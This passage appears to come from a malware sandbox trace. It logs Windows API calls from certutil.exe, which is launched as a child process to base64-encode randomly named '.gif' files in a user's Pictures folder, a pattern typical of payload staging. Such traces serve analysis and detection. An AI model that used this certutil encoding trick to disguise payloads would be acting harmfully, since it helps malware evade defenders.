(uFlags=0x0, uBytes=0x54) returned 0x2620e3187f0 [0294.865] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.865] _vsnwprintf (in: _Buffer=0xa899dfe730, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xa899dff788 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0294.865] GetFileType (hFile=0x50) returned 0x2 [0294.865] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa899dfe730*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xa899dfe6e4, lpReserved=0x0 | out: lpBuffer=0xa899dfe730*, lpNumberOfCharsWritten=0xa899dfe6e4*=0x31) returned 1 [0294.865] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.866] _vsnwprintf (in: _Buffer=0xa899dfe730, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa899dff788 | out: _Buffer="\n") returned 1 [0294.866] GetFileType (hFile=0x50) returned 0x2 [0294.866] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa899dfe730*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa899dfe6e4, lpReserved=0x0 | out: lpBuffer=0xa899dfe730*, lpNumberOfCharsWritten=0xa899dfe6e4*=0x1) returned 1 [0294.870] LocalFree (hMem=0x0) returned 0x0 [0294.870] LocalFree (hMem=0x2620e319170) returned 0x0 [0294.871] LocalFree (hMem=0x2620e314420) returned 0x0 [0294.871] SetLastError (dwErrCode=0x80070716) [0294.871] _vsnwprintf (in: _Buffer=0xa899dff7b8, _BufferCount=0xb, _Format="%d", _ArgList=0xa899dff7a8 | out: _Buffer="511") returned 3 [0294.871] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xa899dff570, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0294.871] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2620e340360 [0294.871] PostQuitMessage (nExitCode=0) [0294.871] GetMessageW (in: lpMsg=0xa899dffdb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa899dffdb0) returned 0 [0294.871] LocalFree (hMem=0x2620e32b310) returned 0x0 [0294.871] LocalFree (hMem=0x2620e340720) returned 0x0 [0294.872] LocalFree (hMem=0x0) returned 0x0 [0294.872] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0294.873] GetLastError () returned 0x7e [0294.873] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0294.873] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0294.873] DllMain () returned 0x1 [0294.873] LocalFree (hMem=0x2620e32b8f0) returned 0x0 [0294.873] LocalFree (hMem=0x2620e324150) returned 0x0 [0294.873] LocalFree (hMem=0x2620e340270) returned 0x0 [0294.873] LocalFree (hMem=0x2620e340570) returned 0x0 [0294.873] LocalFree (hMem=0x2620e3187f0) returned 0x0 [0294.874] LocalFree (hMem=0x2620e340360) returned 0x0 [0294.874] LocalFree (hMem=0x2620e321d00) returned 0x0 [0294.874] LocalFree (hMem=0x2620e323fd0) returned 0x0 [0294.874] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0294.874] GetLastError () returned 0x7e [0294.874] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0294.874] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0294.875] DllMain () returned 0x1 [0294.875] exit (_Code=0) Thread: id = 112 os_tid = 0x11e8 Process: id = "43" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2b86b000" os_pid = "0x11d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0xfb0 [0295.316] GetStartupInfoW (in: lpStartupInfo=0x3f4493f7c0 | out: lpStartupInfo=0x3f4493f7c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0295.318] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0295.318] __set_app_type (_Type=0x1) [0295.318] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0295.318] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0295.322] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0295.322] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0295.323] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0295.323] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0295.323] WerSetFlags () returned 0x0 [0295.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0295.324] __iob_func () returned 0x7ffcea2dea00 [0295.324] _fileno (_File=0x7ffcea2dea30) returned 1 [0295.324] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0295.324] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0295.325] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0295.326] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0295.326] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0295.326] GetConsoleOutputCP () returned 0x1b5 [0295.327] _vsnwprintf (in: _Buffer=0x3f4493f730, _BufferCount=0xb, _Format=".%d", _ArgList=0x3f4493f658 | out: _Buffer=".437") returned 4 [0295.327] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0295.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.328] GetFileType (hFile=0x50) returned 0x2 [0295.328] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0295.328] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0295.328] SetThreadUILanguage (LangId=0x0) returned 0x409 [0295.329] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0295.329] GetCommandLineW () returned="certutil -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\"" [0295.329] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x22f9558b810 [0295.329] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22f9557cc10 [0295.329] LocalFree (hMem=0x22f9558b810) returned 0x0 [0295.329] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22f9557cac0 [0295.329] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x22f9557c7c0 [0295.330] LocalFree (hMem=0x22f9557cac0) returned 0x0 [0295.330] LocalFree (hMem=0x22f9557cc10) returned 0x0 [0295.330] LocalFree (hMem=0x0) returned 0x0 [0295.330] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0295.330] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0295.331] GetCommandLineW () returned="certutil -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\"" [0295.331] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x22f9558b950 [0295.331] GetSystemTime (in: lpSystemTime=0x3f4493f420 | out: lpSystemTime=0x3f4493f420*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x9, wMilliseconds=0x366)) [0295.331] SystemTimeToFileTime (in: lpSystemTime=0x3f4493f420, lpFileTime=0x3f4493f418 | out: lpFileTime=0x3f4493f418) returned 1 [0295.331] FileTimeToLocalFileTime (in: lpFileTime=0x3f4493f418, lpLocalFileTime=0x3f4493f3e0 | out: lpLocalFileTime=0x3f4493f3e0) returned 1 [0295.331] FileTimeToSystemTime (in: lpFileTime=0x3f4493f3e0, lpSystemTime=0x3f4493f150 | out: lpSystemTime=0x3f4493f150) returned 1 [0295.331] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x3f4493f150, lpFormat=0x0, lpDateStr=0x3f4493f260, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0295.331] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x3f4493f150, lpFormat=0x0, lpTimeStr=0x3f4493f160, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0295.332] _vsnwprintf (in: _Buffer=0x3f4493f16e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x3f4493f138 | out: _Buffer=" 09.870s") returned 8 [0295.332] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x22f9558dd50 [0295.332] SetLastError (dwErrCode=0x80070716) [0295.332] _vsnwprintf (in: _Buffer=0x3f4493f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0x3f4493f1d8 | out: _Buffer="948") returned 3 [0295.332] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x3f4493efa0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0295.332] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x22f9558b730 [0295.332] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x22f9557cda0 [0295.332] LocalFree (hMem=0x22f9558dd50) returned 0x0 [0295.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3f4493f490 | out: lpSystemTimeAsFileTime=0x3f4493f490*(dwLowDateTime=0xdaa41c69, dwHighDateTime=0x1d6141f)) [0295.333] GetLocalTime (in: lpSystemTime=0x3f4493f4c8 | out: lpSystemTime=0x3f4493f4c8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x9, wMilliseconds=0x369)) [0295.333] SystemTimeToFileTime (in: lpSystemTime=0x3f4493f4c8, lpFileTime=0x3f4493f4a0 | out: lpFileTime=0x3f4493f4a0) returned 1 [0295.333] CompareFileTime (lpFileTime1=0x3f4493f4a0, lpFileTime2=0x3f4493f490) returned 1 [0295.333] _vsnwprintf (in: _Buffer=0x3f4493f4d8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x3f4493f468 | out: _Buffer="GMT + 2.00") returned 10 [0295.333] LocalFree (hMem=0x22f9558b950) returned 0x0 [0295.333] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde670000 [0295.334] FindResourceW (hModule=0x7ffcde670000, lpName=0x1, lpType=0x10) returned 0x7ffcde730090 [0295.334] LoadResource (hModule=0x7ffcde670000, hResInfo=0x7ffcde730090) returned 0x7ffcde7300b0 [0295.334] LockResource (hResData=0x7ffcde7300b0) returned 0x7ffcde7300b0 [0295.334] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0295.334] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x3f4493f508 | out: _Buffer="10.0.15063.447") returned 14 [0295.334] GetACP () returned 0x4e4 [0295.334] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0295.334] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22f9558b950 [0295.334] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22f9558b950, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0295.334] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22f9558e250 [0295.334] _vsnwprintf (in: _Buffer=0x22f9558e250, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3f4493f558 | out: _Buffer="10.0.15063.447 retail") returned 21 [0295.334] LocalFree (hMem=0x22f9558b950) returned 0x0 [0295.334] LocalFree (hMem=0x0) returned 0x0 [0295.335] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0295.335] GetACP () returned 0x4e4 [0295.335] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0295.335] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22f9558b850 [0295.335] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22f9558b850, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0295.335] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22f9558e090 [0295.335] _vsnwprintf (in: _Buffer=0x22f9558e090, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3f4493f558 | out: _Buffer="10.0.15063.447 retail") returned 21 [0295.335] LocalFree (hMem=0x22f9558b850) returned 0x0 [0295.335] LocalFree (hMem=0x0) returned 0x0 [0295.335] GetACP () returned 0x4e4 [0295.335] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0295.335] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22f9558b510 [0295.335] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22f9558b510, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0295.335] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22f9558e050 [0295.335] _vsnwprintf (in: _Buffer=0x22f9558e050, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3f4493f588 | out: _Buffer="10.0.15063.447 retail") returned 21 [0295.335] LocalFree (hMem=0x22f9558b510) returned 0x0 [0295.335] LocalFree (hMem=0x22f9558e250) returned 0x0 [0295.335] LocalFree (hMem=0x22f9558e090) returned 0x0 [0295.335] LocalFree (hMem=0x22f9558e050) returned 0x0 [0295.336] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0295.336] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0295.336] GetStockObject (i=0) returned 0x900010 [0295.336] RegisterClassW (lpWndClass=0x3f4493f6b0) returned 0xc1a2 [0295.336] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1502c6 [0295.429] NtdllDefWindowProc_W () returned 0x0 [0295.429] NtdllDefWindowProc_W () returned 0x1 [0295.437] NtdllDefWindowProc_W () returned 0x0 [0295.450] UpdateWindow (hWnd=0x1502c6) returned 1 [0295.450] PostMessageW (hWnd=0x1502c6, Msg=0x400, wParam=0x0, lParam=0x22f9557217e) returned 1 [0295.450] GetMessageW (in: lpMsg=0x3f4493f700, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3f4493f700) returned 1 [0295.450] TranslateMessage (lpMsg=0x3f4493f700) returned 0 [0295.450] DispatchMessageW (lpMsg=0x3f4493f700) returned 0x0 [0295.450] NtdllDefWindowProc_W () returned 0x0 [0295.450] GetMessageW (in: lpMsg=0x3f4493f700, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3f4493f700) returned 1 [0295.451] TranslateMessage (lpMsg=0x3f4493f700) returned 0 [0295.451] DispatchMessageW (lpMsg=0x3f4493f700) returned 0x0 [0295.451] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x22f95574430 [0295.451] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x22f9557aed0 [0295.451] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0295.451] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0295.451] SetLastError (dwErrCode=0x80070716) [0295.451] _vsnwprintf (in: _Buffer=0x3f4493f108, _BufferCount=0xb, _Format="%d", _ArgList=0x3f4493f0f8 | out: _Buffer="465") returned 3 [0295.451] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x3f4493eec0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0295.451] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22f95595200 [0295.452] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0295.452] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0295.452] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x3f4493eea0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0295.452] GetLastError () returned 0xcb [0295.452] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0295.452] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0295.452] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0295.453] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0295.453] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0295.453] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0295.453] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0295.453] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0295.453] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0295.453] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0295.453] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0295.453] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0295.453] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0295.453] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0295.453] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0295.453] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0295.453] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0295.453] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0295.453] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0295.453] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0295.453] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0295.453] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x3f4493eb68 | out: phkResult=0x3f4493eb68*=0x23c) returned 0x0 [0295.454] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x22f9557d3f0 [0295.454] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x3f4493f0d8, lpData=0x3f4493f108, lpcbData=0x3f4493f0d0*=0x4 | out: lpType=0x3f4493f0d8*=0x0, lpData=0x3f4493f108*=0x0, lpcbData=0x3f4493f0d0*=0x4) returned 0x2 [0295.454] LocalFree (hMem=0x22f9557d3f0) returned 0x0 [0295.454] RegCloseKey (hKey=0x23c) returned 0x0 [0295.454] LocalFree (hMem=0x0) returned 0x0 [0295.454] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x22f9559d530 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0295.472] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0295.472] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0295.473] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0295.473] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x22f955a1010 [0295.473] GetComputerNameW (in: lpBuffer=0x22f955a1010, nSize=0x3f4493f0d0 | out: lpBuffer="NQDPDE", nSize=0x3f4493f0d0) returned 1 [0295.473] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x3f4493f0a0 | out: lpBuffer=0x0, nSize=0x3f4493f0a0) returned 0 [0295.474] GetLastError () returned 0xea [0295.474] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22f9558b570 [0295.474] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x22f9558b570, nSize=0x3f4493f0a0 | out: lpBuffer="NQdPdE", nSize=0x3f4493f0a0) returned 1 [0295.474] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0295.477] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x22f955a1230, cbCertEncoded=0xfa3) returned 0x0 [0295.480] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x22f955a1230, cbCrlEncoded=0xfa3) returned 0x0 [0295.480] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x22f955a1230, cbEncoded=0xfa3, dwFlags=0x8000, pDecodePara=0x3f4493ef80, pvStructInfo=0x3f4493f010, pcbStructInfo=0x3f4493f004 | out: pvStructInfo=0x3f4493f010, pcbStructInfo=0x3f4493f004) returned 0 [0295.480] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x22f955a1230, cbEncoded=0xfa3, dwFlags=0x8000, pDecodePara=0x3f4493ef80, pvStructInfo=0x3f4493f010, pcbStructInfo=0x3f4493f004 | out: pvStructInfo=0x3f4493f010, pcbStructInfo=0x3f4493f004) returned 0 [0295.480] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x22f955a1230, cbEncoded=0xfa3, dwFlags=0x8000, pDecodePara=0x3f4493ef80, pvStructInfo=0x3f4493f010, pcbStructInfo=0x3f4493f004 | out: pvStructInfo=0x3f4493f010, pcbStructInfo=0x3f4493f004) returned 0 [0295.481] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x22f955855a0 [0295.495] CryptMsgUpdate (hCryptMsg=0x22f955855a0, pbData=0x22f955a1230, cbData=0xfa3, fFinal=1) returned 0 [0295.495] GetLastError () returned 0x8009310b [0295.495] CryptMsgClose (hCryptMsg=0x22f955855a0) returned 1 [0295.495] GetFileAttributesExW (in: lpFileName="CBqE_ptIfCfIXOkQ.gif.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\cbqe_ptifcfixokq.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0x3f4493f030 | out: lpFileInformation=0x3f4493f030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61adacc0, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0x77878d60, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x77878d60, ftLastWriteTime.dwHighDateTime=0x1d5ee34, nFileSizeHigh=0x0, nFileSizeLow=0xfa3)) returned 1 [0295.495] _vsnwprintf (in: _Buffer=0x3f4493f038, _BufferCount=0xb, _Format="%d", _ArgList=0x3f4493f028 | out: _Buffer="359") returned 3 [0295.496] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x3f4493edf0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0295.496] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x22f955a0c80 [0295.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.496] _vsnwprintf (in: _Buffer=0x3f4493e020, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x3f4493f078 | out: _Buffer="Input Length = 4003") returned 19 [0295.496] GetFileType (hFile=0x50) returned 0x2 [0295.496] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3f4493e020*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x3f4493dfd4, lpReserved=0x0 | out: lpBuffer=0x3f4493e020*, lpNumberOfCharsWritten=0x3f4493dfd4*=0x13) returned 1 [0295.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.498] _vsnwprintf (in: _Buffer=0x3f4493e020, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3f4493f078 | out: _Buffer="\n") returned 1 [0295.498] GetFileType (hFile=0x50) returned 0x2 [0295.498] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3f4493e020*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3f4493dfd4, lpReserved=0x0 | out: lpBuffer=0x3f4493e020*, lpNumberOfCharsWritten=0x3f4493dfd4*=0x1) returned 1 [0295.510] GetFileAttributesExW (in: lpFileName="CBqE_ptIfCfIXOkQ.gif.Cruel" (normalized: 